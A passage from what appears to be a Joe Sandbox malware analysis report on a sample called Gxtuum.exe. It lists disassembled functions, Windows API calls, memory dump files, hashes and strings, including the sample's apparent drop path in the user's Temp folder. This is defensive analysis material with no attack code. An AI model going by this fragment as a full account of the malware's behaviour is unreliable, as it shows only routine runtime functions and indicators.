                                                                • __Getctype.LIBCPMT ref: 00104C7D
                                                                • std::_Facet_Register.LIBCPMT ref: 00104C9C
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00104CB4
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                • String ID:
                                                                • API String ID: 1102183713-0
                                                                • Opcode ID: 7bfc0a7a250bd98fc69d2362d30fff25caccca24b5cc0f5609841732e373f850
                                                                • Instruction ID: 6396b66ffb2b629aea17262d6c08dbbcf950cd70c82143d6483110cea3279714
                                                                • Opcode Fuzzy Hash: 7bfc0a7a250bd98fc69d2362d30fff25caccca24b5cc0f5609841732e373f850
                                                                • Instruction Fuzzy Hash: A141EFB0D052148FDB25DF54C980AAEB7F0EF65710F14816DE885AB291DBB0AE41CB80
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0010CD9B,0010B434,00108149,07E9847F,?,?,?,00000000,0012CE07,000000FF,?,000E2576,?,?), ref: 0010CDB2
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0010CDC0
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0010CDD9
                                                                • SetLastError.KERNEL32(00000000,?,00000000,0012CE07,000000FF,?,000E2576,?,?,?,000E3BA5,00000000,?,00000000,0012C7A0,000000FF), ref: 0010CE2B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: eddba5d504619df100807c6694ad3f8fe9c7febc8fc8cd1561bb9eae5b867667
                                                                • Instruction ID: 62df7a1b25fd168e0736f5d8d9736ccd105d227204d4c8ae8e0343f5049f3dd0
                                                                • Opcode Fuzzy Hash: eddba5d504619df100807c6694ad3f8fe9c7febc8fc8cd1561bb9eae5b867667
                                                                • Instruction Fuzzy Hash: 1C01F73A20C3226EE62827F4BC865572F44EB53B7A330033AF555854F2EFD14C82AAC1
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, xrefs: 0011FA3C
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                • API String ID: 0-1719652438
                                                                • Opcode ID: 552a1fe6eb7c5d9877c09fa0bb41a6522d9c0de427a3fecec861b8b1fd73cc4e
                                                                • Instruction ID: 0a16cb424732bf75f794bdc2573a76de82e68b4003b28ebe3485d2ac29d04f5d
                                                                • Opcode Fuzzy Hash: 552a1fe6eb7c5d9877c09fa0bb41a6522d9c0de427a3fecec861b8b1fd73cc4e
                                                                • Instruction Fuzzy Hash: 5821F271200206BF9B28AF64AC809EBB7ACEF10364725413CF96DCB190DB75DCC187A0
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,?,?,0010DEB8,?,?,00000000,?,?,0010DF6A,00000002,FlsGetValue,001333D8,001333E0,?), ref: 0010DE87
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID: api-ms-
                                                                • API String ID: 3664257935-2084034818
                                                                • Opcode ID: 1bacbfb87c9b143c057d81b260fb57016a62a71a35dc66335a6fafe5a734f1eb
                                                                • Instruction ID: 7ff05bdb137b88191909e55fc68cf6957304ecba2a57e075cd835fa4d2e95e7c
                                                                • Opcode Fuzzy Hash: 1bacbfb87c9b143c057d81b260fb57016a62a71a35dc66335a6fafe5a734f1eb
                                                                • Instruction Fuzzy Hash: 3D11C631A41221BBDF224BB8EC45B5A7794AF25B70F260220FD51EF2C0D7B0ED4086D4
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0010E287,?,?,0010E24F,?,?,?), ref: 0010E2A7
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0010E2BA
                                                                • FreeLibrary.KERNEL32(00000000,?,?,0010E287,?,?,0010E24F,?,?,?), ref: 0010E2DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 140cbcf31cddbefdfac5b30fa5cb9a4f63d4862c49c5a0a343b1d8ac611286b1
                                                                • Instruction ID: b08d25d593ff054763ea55c32dbb6d13d30d2d156384adbc18996e1b9fffb184
                                                                • Opcode Fuzzy Hash: 140cbcf31cddbefdfac5b30fa5cb9a4f63d4862c49c5a0a343b1d8ac611286b1
                                                                • Instruction Fuzzy Hash: 9EF03031A44219FBDB11AB51ED0ABDEBEB9EF00756F104060F901E25A0CBB58F40DB95
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: __alloca_probe_16__freea$Info
                                                                • String ID:
                                                                • API String ID: 2330168043-0
                                                                • Opcode ID: 55b4e77b6a27666cf0bc193f5e99abec728bc60178962cd8842f5d253d6613eb
                                                                • Instruction ID: 66976df8d5d450776baf7ae9f74bf6d5260234ae31b7d3d6339bfeac9f5fb5b0
                                                                • Opcode Fuzzy Hash: 55b4e77b6a27666cf0bc193f5e99abec728bc60178962cd8842f5d253d6613eb
                                                                • Instruction Fuzzy Hash: E981B17290C239ABDF259FA4A941AEF7BB6AF09310F190195E810A72C1E7319C60C7B0
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1108d4a3568cb09aef85ed022a920e33bc5de686c1c8e46f3001e677a8f36aa2
                                                                • Instruction ID: b8eb0d5540ca35009ec4f40a9b9e87a4bb4a535c74069c8f637bb4723429c4d5
                                                                • Opcode Fuzzy Hash: 1108d4a3568cb09aef85ed022a920e33bc5de686c1c8e46f3001e677a8f36aa2
                                                                • Instruction Fuzzy Hash: 8281C2B0A0024CEFEF14DFA8C94ABEEBBB5EF05304F544158E941676C2D7B55A44CBA2
                                                                APIs
                                                                • __alloca_probe_16.LIBCMT ref: 0011C8AA
                                                                • __alloca_probe_16.LIBCMT ref: 0011C970
                                                                • __freea.LIBCMT ref: 0011C9DC
                                                                  • Part of subcall function 001187D5: HeapAlloc.KERNEL32(00000000,?,?,?,0011FF40,00000220,?,?,?,?,?,?,0010F4C2,?), ref: 00118807
                                                                • __freea.LIBCMT ref: 0011C9E5
                                                                • __freea.LIBCMT ref: 0011CA08
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                • String ID:
                                                                • API String ID: 1096550386-0
                                                                • Opcode ID: b78ff9a1162aaffd0fc4a418809ef60e0a91f129696e310d3de8a9eba3f0bcf6
                                                                • Instruction ID: 874f891fe1372c21e0d2f283cdf5ffeb81003457e1a7453880b44728dad860a0
                                                                • Opcode Fuzzy Hash: b78ff9a1162aaffd0fc4a418809ef60e0a91f129696e310d3de8a9eba3f0bcf6
                                                                • Instruction Fuzzy Hash: 9C51907258021AAFDB299E948C82EFF37AAEF54754F254139F904E7140EB71DC9187E0
                                                                APIs
                                                                  • Part of subcall function 001187D5: HeapAlloc.KERNEL32(00000000,?,?,?,0011FF40,00000220,?,?,?,?,?,?,0010F4C2,?), ref: 00118807
                                                                • _free.LIBCMT ref: 001159E4
                                                                • _free.LIBCMT ref: 001159FB
                                                                • _free.LIBCMT ref: 00115A18
                                                                • _free.LIBCMT ref: 00115A33
                                                                • _free.LIBCMT ref: 00115A4A
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$AllocHeap
                                                                • String ID:
                                                                • API String ID: 1835388192-0
                                                                • Opcode ID: 969deb2e3e69092609fbb7f8b3f597066b92db7339eab202b9b9f02cd3e5195d
                                                                • Instruction ID: 8b17ba3761a40a20a38da10916b4ea71081da0c28e9052c55f39dbd69bcce02f
                                                                • Opcode Fuzzy Hash: 969deb2e3e69092609fbb7f8b3f597066b92db7339eab202b9b9f02cd3e5195d
                                                                • Instruction Fuzzy Hash: A6510431A00708EFDB29DF69DC81AAAB3F6EF94724F004679E405D7251E731EA818B50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                                • String ID:
                                                                • API String ID: 3354401312-0
                                                                • Opcode ID: 43b7aa521603b0595b701a75a9f12594dc4effc362434c999e76b1252fff7a20
                                                                • Instruction ID: bf3c2a2986b4e433c90e86415bfc079f80682a7175fcaef0c03bb4692545e78e
                                                                • Opcode Fuzzy Hash: 43b7aa521603b0595b701a75a9f12594dc4effc362434c999e76b1252fff7a20
                                                                • Instruction Fuzzy Hash: 62617AB0D05209DFDB14DFA4C954BAEBBB8BF05304F104169E845AB382DBB5AA05CFA0
                                                                APIs
                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00110B2E), ref: 00110C1E
                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00110C78
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00110B2E,?,000000FF,00000000,00000000), ref: 00110D06
                                                                • __dosmaperr.LIBCMT ref: 00110D0D
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00110D4A
                                                                  • Part of subcall function 00110F72: __dosmaperr.LIBCMT ref: 00110FA7
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                • String ID:
                                                                • API String ID: 1206951868-0
                                                                • Opcode ID: 1cc8a59d5013fb2b2e6b7a432353573f0b7417d84a0ac8cf00c068eaae57a3e8
                                                                • Instruction ID: 3716f6dd041ed6623868c3c0883e798dcf79b5caefb4e3dead37e92231efa9da
                                                                • Opcode Fuzzy Hash: 1cc8a59d5013fb2b2e6b7a432353573f0b7417d84a0ac8cf00c068eaae57a3e8
                                                                • Instruction Fuzzy Hash: 30412C75900208ABCF29DFE5EC459EBBBF9EF89300B144529F956D3611EB71A980CB21
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00105336
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00105356
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00105376
                                                                • std::_Facet_Register.LIBCPMT ref: 00105411
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00105429
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                • String ID:
                                                                • API String ID: 459529453-0
                                                                • Opcode ID: bd449b1cf50f1b0824b864cc7753df62ef5c963a84b140ba91e0b8d1ed115ec9
                                                                • Instruction ID: 5c47ffdc3bc80415db7d80dfaff98fb4109c58f0514668b30f5c2923fe6a5cd5
                                                                • Opcode Fuzzy Hash: bd449b1cf50f1b0824b864cc7753df62ef5c963a84b140ba91e0b8d1ed115ec9
                                                                • Instruction Fuzzy Hash: 1F41DB71A046148BCB24DF94D891BAFB7B1FB10750F14416DE885AB2D2DBB0AD41CFC0
                                                                APIs
                                                                • _free.LIBCMT ref: 001212C3
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 001212D5
                                                                • _free.LIBCMT ref: 001212E7
                                                                • _free.LIBCMT ref: 001212F9
                                                                • _free.LIBCMT ref: 0012130B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 57c3080107bfd6484526c6dc4c0b97262882e65fdfd59cad3f49b8994cab46f8
                                                                • Instruction ID: 40c2ab29af0652240c3ab8723107d59f5a7215e96ea344e2803d8fa996e69510
                                                                • Opcode Fuzzy Hash: 57c3080107bfd6484526c6dc4c0b97262882e65fdfd59cad3f49b8994cab46f8
                                                                • Instruction Fuzzy Hash: 2DF0FF32504710B7C668DB65F8C1C9AB3EAEBA27247644815F008E7A11CB64FCD04664
                                                                APIs
                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 000E499F
                                                                  • Part of subcall function 0010B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,00143A84,?,?,?,00143A84), ref: 0010B4A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise___std_exception_copy
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 3109751735-1866435925
                                                                • Opcode ID: 55b5a8be54027fd119b72b352665439b9a0c73d6b4be37d0a33d50e2c51a3bac
                                                                • Instruction ID: 846e26d5a2fd8925943d3f2320ee7275e11263505f9480d6d21ffe2b15cf7c1b
                                                                • Opcode Fuzzy Hash: 55b5a8be54027fd119b72b352665439b9a0c73d6b4be37d0a33d50e2c51a3bac
                                                                • Instruction Fuzzy Hash: 111138B1600744AFC710DF59C942B97B7ECEF51310F14852AF865BB682EBB0E914CB91
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _strrchr
                                                                • String ID:
                                                                • API String ID: 3213747228-0
                                                                • Opcode ID: c17452bd9d257a50ccdb3366d6f14b865b7cd1596f197bae603c132cad26c692
                                                                • Instruction ID: 01b1fa65dc316c254c0790501d370e3f2fd7fcbdf83ec27eb9505082b9956c75
                                                                • Opcode Fuzzy Hash: c17452bd9d257a50ccdb3366d6f14b865b7cd1596f197bae603c132cad26c692
                                                                • Instruction Fuzzy Hash: 36B147729002859FDB19CF68C8A1BFEBBE5EF55300F15407AE865DB281D7348D81CB60
                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,07E9847F,0000000F,00000000), ref: 000E944A
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: 28bad304fe7bea6b9131247cbe0ef3a1ee5b4fd27d872064cda03ce25c4a5f77
                                                                • Instruction ID: fda2fdee2f281e772ddecb87264bcdfa4d902b2b1d0ea37ff1da1a9c68973c16
                                                                • Opcode Fuzzy Hash: 28bad304fe7bea6b9131247cbe0ef3a1ee5b4fd27d872064cda03ce25c4a5f77
                                                                • Instruction Fuzzy Hash: 8261E9B0E04284AFDF20EB69DD467ADBBB5EB52314F50029DE441B72D2DB754AC48BC2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID:
                                                                • API String ID: 1740715915-0
                                                                • Opcode ID: 8caa5cf7941ff8a791b1a94f130300ff0b3d953928c159b0c508f2b09e30ffb7
                                                                • Instruction ID: a5923b7cfc2afc90f983661ba7d73fd6d8d74e19b643899eda53915f1eb4d227
                                                                • Opcode Fuzzy Hash: 8caa5cf7941ff8a791b1a94f130300ff0b3d953928c159b0c508f2b09e30ffb7
                                                                • Instruction Fuzzy Hash: CA51E172605207AFDB289F50D881BAAB7A6FF14700F244229F885972E1D7B1ED41CFD1
                                                                APIs
                                                                • GetVersionExW.KERNEL32(0000011C,?,07E9847F), ref: 000E9A99
                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9B00
                                                                • GetProcAddress.KERNEL32(00000000), ref: 000E9B07
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcVersion
                                                                • String ID:
                                                                • API String ID: 3310240892-0
                                                                • Opcode ID: 921936cf9502d40d143e2decb72a07f909509c135ad63afe9d934b7865cb02ac
                                                                • Instruction ID: b8a5d84292d5f67c145da9afd0099f7395e6fd822e60d0df30a262ccbf444220
                                                                • Opcode Fuzzy Hash: 921936cf9502d40d143e2decb72a07f909509c135ad63afe9d934b7865cb02ac
                                                                • Instruction Fuzzy Hash: DA5127709142889FDB24EB29DE497DDBB75EF45310F5042A8E805A72D1EB704AC0CB91
                                                                APIs
                                                                • __Mtx_unlock.LIBCPMT ref: 001062E7
                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00106339
                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00106349
                                                                  • Part of subcall function 000E3A60: __Mtx_unlock.LIBCPMT ref: 000E3B54
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                                • String ID:
                                                                • API String ID: 3298230783-0
